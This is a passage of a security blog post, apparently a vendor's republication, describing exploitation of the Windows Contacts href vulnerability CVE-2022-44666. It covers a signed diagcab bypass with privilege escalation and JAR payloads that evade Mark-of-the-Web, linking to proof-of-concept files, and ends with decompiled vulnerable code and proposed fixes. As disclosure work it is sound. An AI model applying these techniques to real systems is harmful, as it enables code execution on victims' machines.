href=\"https:\/\/twitter.com\/edu_braun_0day\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">Eduardo Braun Prado<\/a> gave me the idea to use this technique over here.<\/p><p>There are some pre-requirements to do this:<\/p><ol><li><p>The target user has to belong to administrator group. If not, there&#8217;s a UAC prompt.<\/p><\/li><li><p>The diagcab file has to be signed, so the codesigning certificate must have been installed in the target computer.<\/p><\/li><\/ol><p>A real attack scenario would pass for stealing a code signing certificate which is in fact installed in the target system. But as this is just a proof of concept, a self-signed code signing certificate was generated and used to sign the diagcab file named as <a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/bypass\/diagcab-pocs\/MSWord\/hidden\/@payload.diagcab\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">@payload.diagcab<\/a>.<\/p><p>So in order to repro, it&#8217;s needed to install the certificate located in <a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/bypass\/diagcab-pocs\/cert.cer\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">cert.cer<\/a> under Trusted Root Certificate Authority <a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/bypass\/videos\/install-certificate.gif\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">like this<\/a>:<\/p><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/cljp9mzob1lzx0uqo0cio9w5n.gif\" \/><\/p><p>To finally elevate the priveleges, a token stealing\/impersonation could be used. In this case, <a href=\"https:\/\/decoder.cloud\/2018\/02\/02\/getting-system\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">&#8220;parent process&#8221; technique<\/a> was the <a href=\"https:\/\/github.com\/decoder-it\/psgetsystem\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">chosen one<\/a>. A modified version for this script was included inside the resolver scripts.<\/p><p>For further info, there&#8217;s a video for <a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/bypass\/videos\/ldap-msword-diagcab-exploit.gif\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">MS Word and LDAP url protocol<\/a>.<\/p><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/cljp9nanz1m340uo3b8a418in.gif\" \/><\/p><p>Proof of concept located in <a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/bypass\/diagcab-pocs\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/bypass\/diagcab-pocs<\/a>.<\/p><h2>JAR files as payload<\/h2><p><strong><em>Update 2023\/06\/19:<\/em><\/strong> After reading <a href=\"https:\/\/twitter.com\/pfiatde\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">@pfiatde<\/a>&#8216;s <a href=\"https:\/\/badoption.eu\/blog\/2023\/06\/01\/zipjar.html\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">post on &#8220;ZipJar&#8221;<\/a>, this interesting information makes JAR files a good candidate to be used as payload in this vulnerability, which by the way it is still 0day nowadays, as the MotW gets ignored, doesn&#8217;t require accepting any prompt.<\/p><p>JAR payload was taken from github repository <a href=\"https:\/\/github.com\/arntsonl\/calc_security_poc\/tree\/master\/jar\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">calc_security_poc<\/a>.<\/p><p>There you go attached a little builder, <a href=\"http:\/\/create-poc.py\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">create-poc.py<\/a> to make your own POC from some template.<\/p><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/cljp9ns2a1m070uqo9w9r3fu9.gif\" \/><\/p><p>Don&#8217;t forget give the thanks to <a href=\"https:\/\/twitter.com\/microlovu\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">@microlovu<\/a> and <a href=\"https:\/\/twitter.com\/mlftsecresponse\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">@mlftsecresponse<\/a>. \ud83d\ude02<\/p><h2>Proposed fix<\/h2><p>Remember the vulnerable code in the function &#8220;fnSummaryProc&#8221;:<\/p><pre><code>...\nLABEL_44:\n        SafeExecute(v29, v24, v30); \/\/ Vulnerable call to shellexecute\n        return 1i64;\n      }\n    }\n    else\n    {\n      if ( v23 )\n        v32 = IsInternetAddress(v23, &amp;v38); \/\/ Bypass with a single \"@\"\n      else\n        v32 = 0;\n      v29 = v7;\n      if ( v32 )\n      {\n        v30 = v23;\n        goto LABEL_44;\n      }\n    }\n...<\/code><\/pre><p>The function &#8220;IsInternetAddress&#8221; was intentionally created to check if the href attr corresponds to any email address. So my proposed fix (and following the imported functions that the library uses) would be:<\/p><pre><code>...\n      if (v32 &amp;&amp; !(unsigned int)StrCmpNICW(L\"mailto:\", v23, 7i64)) \/\/ Check out the href really starts with \"mailto:\"\n      {\n          v30 = v23;\n          goto LABEL_44;\n      }\n...<\/code><\/pre><p>So simple like this, it&#8217;s only needed to check this out before calling to &#8220;SafeExecute&#8221;. Just testing if the target string (v23) starts with &#8220;mailto:&#8221;, the bug would be fully fixed IMHO.<\/p><h2>Unofficial fix<\/h2><p>Some days\/weeks ago when i contacted <a href=\"https:\/\/twitter.com\/mkolsek\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">@mkolsek<\/a> of <a href=\"https:\/\/0patch.com\/\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">0patch<\/a> to inform him about this issue, who by the way is always very kind to me, told me this has been receiving <a href=\"https:\/\/blog.0patch.com\/2019\/01\/one-two-three-micropatches-for-three.html\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">an unofficial fix for Windows 7 since then<\/a> (4 years ago). That was a surprise and good news!<\/p><p>It was tested and successfully stopped the new variant of CVE-2022-44666. The micropatch prepends &#8220;<a href=\"http:\/\/&#038;#8221\" rel=\"nofollow\">http:\/\/&#038;#8221<\/a>; to the attacker-controlled string passed by the href attr if doesn&#8217;t start with &#8220;mailto:&#8221;, &#8220;<a href=\"http:\/\/&#038;#8221\" rel=\"nofollow\">http:\/\/&#038;#8221<\/a>; or &#8220;<a href=\"https:\/\/&#038;#8221\" rel=\"nofollow\">https:\/\/&#038;#8221<\/a>;, which is enough to fully fix the issue. Now it&#8217;s going to be extended for the latest Windows versions, only necessary to update some offsets.<\/p><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/cljp9oans1m3h0uo3epic55i9.gif\" \/><\/p><p>Either way, it would be better to get an official patch.<\/p><h2>Acknowledgments<\/h2><ul><li><p><a href=\"https:\/\/twitter.com\/hyp3rlinx\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">@hyp3rlinx<\/a>: Special shout out and acknowledgement because he began this research some years ago and his work was essential for this writeup. <s>He should have been also credited for finding this out but unfortunately i was unable to contact him just in time<\/s>. It&#8217;s already been done (<strong><em>Update 2023\/02\/08<\/em><\/strong>).<\/p><\/li><li><p><a href=\"https:\/\/twitter.com\/edu_braun_0day\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">@Edu_Braun_0day<\/a>: who also worked around <a href=\"https:\/\/packetstormsecurity.com\/files\/151267\/Microsoft-Windows-VCF-Arbitrary-Code-Execution.html\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">this issue<\/a>.<\/p><\/li><li><p><a href=\"https:\/\/twitter.com\/mkolsek\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">@mkolsek<\/a>.<\/p><\/li><li><p><a href=\"https:\/\/twitter.com\/matalaz\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">@matalaz<\/a>.<\/p><\/li><li><p><a href=\"https:\/\/twitter.com\/buffaloverflow\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">@buffaloverflow<\/a>.<\/p><\/li><li><p><a href=\"https:\/\/twitter.com\/msftsecresponse\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">@msftsecresponse<\/a>.<\/p><\/li><li><p>&#8230;<\/p><\/li><\/ul><p>By <a href=\"https:\/\/twitter.com\/j00sean\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">@j00sean<\/a><\/p><\/div>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-8085a61 post-content elementor-widget elementor-widget-shortcode\" data-id=\"8085a61\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"shortcode.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"elementor-shortcode\">\t\t<div data-elementor-type=\"page\" data-elementor-id=\"18103\" class=\"elementor elementor-18103\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-748947f elementor-section-full_width elementor-section-height-default elementor-section-height-default\" data-id=\"748947f\" data-element_type=\"section\" data-e-type=\"section\" data-settings=\"{&quot;jet_parallax_layout_list&quot;:[{&quot;jet_parallax_layout_image&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;_id&quot;:&quot;c4f773e&quot;,&quot;jet_parallax_layout_image_tablet&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;jet_parallax_layout_image_mobile&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;jet_parallax_layout_speed&quot;:{&quot;unit&quot;:&quot;%&quot;,&quot;size&quot;:50,&quot;sizes&quot;:[]},&quot;jet_parallax_layout_type&quot;:&quot;scroll&quot;,&quot;jet_parallax_layout_direction&quot;:&quot;1&quot;,&quot;jet_parallax_layout_fx_direction&quot;:null,&quot;jet_parallax_layout_z_index&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_x&quot;:50,&quot;jet_parallax_layout_bg_x_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_x_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_y&quot;:50,&quot;jet_parallax_layout_bg_y_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_y_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_size&quot;:&quot;auto&quot;,&quot;jet_parallax_layout_bg_size_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_size_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_animation_prop&quot;:&quot;transform&quot;,&quot;jet_parallax_layout_on&quot;:[&quot;desktop&quot;,&quot;tablet&quot;]}]}\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-7995c19\" data-id=\"7995c19\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-a437045 elementor-widget elementor-widget-image-box\" data-id=\"a437045\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image-box.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<div class=\"elementor-image-box-wrapper\"><div class=\"elementor-image-box-content\"><h3 class=\"elementor-image-box-title\">About Version 2 Digital<\/h3><p class=\"elementor-image-box-description\">Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.\n<br><br>\nThrough an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.<\/p><\/div><\/div>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t\n\t\t<div data-elementor-type=\"page\" data-elementor-id=\"39690\" class=\"elementor elementor-39690\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-748947f elementor-section-full_width elementor-section-height-default elementor-section-height-default\" data-id=\"748947f\" data-element_type=\"section\" data-e-type=\"section\" data-settings=\"{&quot;jet_parallax_layout_list&quot;:[{&quot;jet_parallax_layout_image&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;_id&quot;:&quot;c4f773e&quot;,&quot;jet_parallax_layout_image_tablet&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;jet_parallax_layout_image_mobile&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;jet_parallax_layout_speed&quot;:{&quot;unit&quot;:&quot;%&quot;,&quot;size&quot;:50,&quot;sizes&quot;:[]},&quot;jet_parallax_layout_type&quot;:&quot;scroll&quot;,&quot;jet_parallax_layout_direction&quot;:&quot;1&quot;,&quot;jet_parallax_layout_fx_direction&quot;:null,&quot;jet_parallax_layout_z_index&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_x&quot;:50,&quot;jet_parallax_layout_bg_x_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_x_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_y&quot;:50,&quot;jet_parallax_layout_bg_y_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_y_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_size&quot;:&quot;auto&quot;,&quot;jet_parallax_layout_bg_size_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_size_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_animation_prop&quot;:&quot;transform&quot;,&quot;jet_parallax_layout_on&quot;:[&quot;desktop&quot;,&quot;tablet&quot;]}]}\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-7995c19\" data-id=\"7995c19\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-ff2a228 elementor-widget elementor-widget-text-editor\" data-id=\"ff2a228\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p><\/p>\n<p><b>About VRX<\/b><br><b>VRX&nbsp;<\/b>is a consolidated vulnerability management platform that protects assets in real time. Its rich, integrated features efficiently pinpoint and remediate the largest risks to your cyber infrastructure. Resolve the most pressing threats with efficient automation features and precise contextual analysis.<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>This is the story about another forgotten 0day fully di [&hellip;]<\/p>\n","protected":false},"author":149011790,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[476,1075,61],"tags":[477,1076],"class_list":["post-69055","post","type-post","status-publish","format-standard","hentry","category-vrx","category-year2023","category-press-release","tag-vrx","tag-1076"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Microsoft Windows Contacts (VCF\/Contact\/LDAP) syslink control href attribute escape vulnerability (CVE-2022-44666) (0day) - Version 2<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.vicarius.io\/blog\/microsoft-windows-contacts-vcfcontactldap-syslink-control-href-attribute-escape-vulnerability-cve-2022-44666-0day\" \/>\n<meta property=\"og:locale\" content=\"zh_HK\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Microsoft Windows Contacts (VCF\/Contact\/LDAP) syslink control href attribute escape vulnerability (CVE-2022-44666) (0day) - Version 2\" \/>\n<meta property=\"og:description\" content=\"This is the story about another forgotten 0day fully di [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.vicarius.io\/blog\/microsoft-windows-contacts-vcfcontactldap-syslink-control-href-attribute-escape-vulnerability-cve-2022-44666-0day\" \/>\n<meta property=\"og:site_name\" content=\"Version 2\" \/>\n<meta property=\"article:published_time\" content=\"2023-07-19T06:31:28+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2023-08-07T07:56:21+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/clk1ce3oc0d6v0ul9fehvgiix.gif?tr=w-1800,c-at_max\" \/>\n<meta name=\"author\" content=\"tracylamv2\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u4f5c\u8005\" \/>\n\t<meta name=\"twitter:data1\" content=\"tracylamv2\" \/>\n\t<meta name=\"twitter:label2\" content=\"\u9810\u8a08\u95b1\u8b80\u6642\u9593\" \/>\n\t<meta name=\"twitter:data2\" content=\"20 \u5206\u9418\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/microsoft-windows-contacts-vcfcontactldap-syslink-control-href-attribute-escape-vulnerability-cve-2022-44666-0day#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/version-2.com\\\/2023\\\/07\\\/microsoft-windows-contacts-vcf-contact-ldap-syslink-control-href-attribute-escape-vulnerability-cve-2022-44666-0day\\\/\"},\"author\":{\"name\":\"tracylamv2\",\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#\\\/schema\\\/person\\\/011bc7c3731c930bcfeecd52fefb6365\"},\"headline\":\"Microsoft Windows Contacts (VCF\\\/Contact\\\/LDAP) syslink control href attribute escape vulnerability (CVE-2022-44666) (0day)\",\"datePublished\":\"2023-07-19T06:31:28+00:00\",\"dateModified\":\"2023-08-07T07:56:21+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/version-2.com\\\/2023\\\/07\\\/microsoft-windows-contacts-vcf-contact-ldap-syslink-control-href-attribute-escape-vulnerability-cve-2022-44666-0day\\\/\"},\"wordCount\":3235,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/microsoft-windows-contacts-vcfcontactldap-syslink-control-href-attribute-escape-vulnerability-cve-2022-44666-0day#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/ik.imagekit.io\\\/14sfaswy6hrz\\\/images\\\/clk1ce3oc0d6v0ul9fehvgiix.gif?tr=w-1800,c-at_max\",\"keywords\":[\"vRx\",\"2023\"],\"articleSection\":[\"vRx\",\"2023\",\"Press Release\"],\"inLanguage\":\"zh-HK\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/microsoft-windows-contacts-vcfcontactldap-syslink-control-href-attribute-escape-vulnerability-cve-2022-44666-0day#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/version-2.com\\\/2023\\\/07\\\/microsoft-windows-contacts-vcf-contact-ldap-syslink-control-href-attribute-escape-vulnerability-cve-2022-44666-0day\\\/\",\"url\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/microsoft-windows-contacts-vcfcontactldap-syslink-control-href-attribute-escape-vulnerability-cve-2022-44666-0day\",\"name\":\"Microsoft Windows Contacts (VCF\\\/Contact\\\/LDAP) syslink control href attribute escape vulnerability (CVE-2022-44666) (0day) - Version 2\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/microsoft-windows-contacts-vcfcontactldap-syslink-control-href-attribute-escape-vulnerability-cve-2022-44666-0day#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/microsoft-windows-contacts-vcfcontactldap-syslink-control-href-attribute-escape-vulnerability-cve-2022-44666-0day#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/ik.imagekit.io\\\/14sfaswy6hrz\\\/images\\\/clk1ce3oc0d6v0ul9fehvgiix.gif?tr=w-1800,c-at_max\",\"datePublished\":\"2023-07-19T06:31:28+00:00\",\"dateModified\":\"2023-08-07T07:56:21+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/microsoft-windows-contacts-vcfcontactldap-syslink-control-href-attribute-escape-vulnerability-cve-2022-44666-0day#breadcrumb\"},\"inLanguage\":\"zh-HK\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/microsoft-windows-contacts-vcfcontactldap-syslink-control-href-attribute-escape-vulnerability-cve-2022-44666-0day\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"zh-HK\",\"@id\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/microsoft-windows-contacts-vcfcontactldap-syslink-control-href-attribute-escape-vulnerability-cve-2022-44666-0day#primaryimage\",\"url\":\"https:\\\/\\\/ik.imagekit.io\\\/14sfaswy6hrz\\\/images\\\/clk1ce3oc0d6v0ul9fehvgiix.gif?tr=w-1800,c-at_max\",\"contentUrl\":\"https:\\\/\\\/ik.imagekit.io\\\/14sfaswy6hrz\\\/images\\\/clk1ce3oc0d6v0ul9fehvgiix.gif?tr=w-1800,c-at_max\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/microsoft-windows-contacts-vcfcontactldap-syslink-control-href-attribute-escape-vulnerability-cve-2022-44666-0day#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"\u9996\u9801\",\"item\":\"https:\\\/\\\/version-2.com\\\/zh\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Microsoft Windows Contacts (VCF\\\/Contact\\\/LDAP) syslink control href attribute escape vulnerability (CVE-2022-44666) (0day)\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#website\",\"url\":\"https:\\\/\\\/version-2.com\\\/zh\\\/\",\"name\":\"Version 2\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/version-2.com\\\/zh\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"zh-HK\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#organization\",\"name\":\"Version 2\",\"url\":\"https:\\\/\\\/version-2.com\\\/zh\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"zh-HK\",\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/i0.wp.com\\\/version-2.com\\\/wp-content\\\/uploads\\\/2020\\\/08\\\/v2-hk-hor-4.png?fit=1795%2C335&ssl=1\",\"contentUrl\":\"https:\\\/\\\/i0.wp.com\\\/version-2.com\\\/wp-content\\\/uploads\\\/2020\\\/08\\\/v2-hk-hor-4.png?fit=1795%2C335&ssl=1\",\"width\":1795,\"height\":335,\"caption\":\"Version 2\"},\"image\":{\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#\\\/schema\\\/person\\\/011bc7c3731c930bcfeecd52fefb6365\",\"name\":\"tracylamv2\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"zh-HK\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/9d01d79cbfd8b2e878f5d701a362cc9fca466d33fec977b59706c23c1a2db15c?s=96&d=identicon&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/9d01d79cbfd8b2e878f5d701a362cc9fca466d33fec977b59706c23c1a2db15c?s=96&d=identicon&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/9d01d79cbfd8b2e878f5d701a362cc9fca466d33fec977b59706c23c1a2db15c?s=96&d=identicon&r=g\",\"caption\":\"tracylamv2\"},\"url\":\"https:\\\/\\\/version-2.com\\\/zh\\\/author\\\/tracylamv2\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Microsoft Windows Contacts (VCF\/Contact\/LDAP) syslink control href attribute escape vulnerability (CVE-2022-44666) (0day) - Version 2","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.vicarius.io\/blog\/microsoft-windows-contacts-vcfcontactldap-syslink-control-href-attribute-escape-vulnerability-cve-2022-44666-0day","og_locale":"zh_HK","og_type":"article","og_title":"Microsoft Windows Contacts (VCF\/Contact\/LDAP) syslink control href attribute escape vulnerability (CVE-2022-44666) (0day) - Version 2","og_description":"This is the story about another forgotten 0day fully di [&hellip;]","og_url":"https:\/\/www.vicarius.io\/blog\/microsoft-windows-contacts-vcfcontactldap-syslink-control-href-attribute-escape-vulnerability-cve-2022-44666-0day","og_site_name":"Version 2","article_published_time":"2023-07-19T06:31:28+00:00","article_modified_time":"2023-08-07T07:56:21+00:00","og_image":[{"url":"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/clk1ce3oc0d6v0ul9fehvgiix.gif?tr=w-1800,c-at_max","type":"","width":"","height":""}],"author":"tracylamv2","twitter_card":"summary_large_image","twitter_misc":{"\u4f5c\u8005":"tracylamv2","\u9810\u8a08\u95b1\u8b80\u6642\u9593":"20 \u5206\u9418"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.vicarius.io\/blog\/microsoft-windows-contacts-vcfcontactldap-syslink-control-href-attribute-escape-vulnerability-cve-2022-44666-0day#article","isPartOf":{"@id":"https:\/\/version-2.com\/2023\/07\/microsoft-windows-contacts-vcf-contact-ldap-syslink-control-href-attribute-escape-vulnerability-cve-2022-44666-0day\/"},"author":{"name":"tracylamv2","@id":"https:\/\/version-2.com\/zh\/#\/schema\/person\/011bc7c3731c930bcfeecd52fefb6365"},"headline":"Microsoft Windows Contacts (VCF\/Contact\/LDAP) syslink control href attribute escape vulnerability (CVE-2022-44666) (0day)","datePublished":"2023-07-19T06:31:28+00:00","dateModified":"2023-08-07T07:56:21+00:00","mainEntityOfPage":{"@id":"https:\/\/version-2.com\/2023\/07\/microsoft-windows-contacts-vcf-contact-ldap-syslink-control-href-attribute-escape-vulnerability-cve-2022-44666-0day\/"},"wordCount":3235,"commentCount":0,"publisher":{"@id":"https:\/\/version-2.com\/zh\/#organization"},"image":{"@id":"https:\/\/www.vicarius.io\/blog\/microsoft-windows-contacts-vcfcontactldap-syslink-control-href-attribute-escape-vulnerability-cve-2022-44666-0day#primaryimage"},"thumbnailUrl":"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/clk1ce3oc0d6v0ul9fehvgiix.gif?tr=w-1800,c-at_max","keywords":["vRx","2023"],"articleSection":["vRx","2023","Press Release"],"inLanguage":"zh-HK","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/www.vicarius.io\/blog\/microsoft-windows-contacts-vcfcontactldap-syslink-control-href-attribute-escape-vulnerability-cve-2022-44666-0day#respond"]}]},{"@type":"WebPage","@id":"https:\/\/version-2.com\/2023\/07\/microsoft-windows-contacts-vcf-contact-ldap-syslink-control-href-attribute-escape-vulnerability-cve-2022-44666-0day\/","url":"https:\/\/www.vicarius.io\/blog\/microsoft-windows-contacts-vcfcontactldap-syslink-control-href-attribute-escape-vulnerability-cve-2022-44666-0day","name":"Microsoft Windows Contacts (VCF\/Contact\/LDAP) syslink control href attribute escape vulnerability (CVE-2022-44666) (0day) - Version 